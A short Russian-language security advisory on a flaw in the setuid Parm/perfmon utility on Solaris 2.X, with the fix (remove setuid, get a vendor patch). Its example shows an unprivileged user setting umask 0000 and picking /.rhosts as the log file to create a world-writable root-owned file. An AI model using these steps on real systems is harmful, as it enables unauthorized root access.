Parm - SunOS программа, которая отображает системную информацию не включенную в стандартный Solaris package. Уязвимость в программе позволяет создавать произвольные файлы с рут привилегиями.
Системы уязвимы:
Solaris 2.X
Пример:
$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &
Выбираешь Logging -> Logging File
Выбираешь file path, который хочешь создать (например: /.rhosts)
Этот файл будет создан в считанные секунды:
-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost
Решение проблемы:
Удалить разрешение setuid. Патч просите у поставщика 🙂
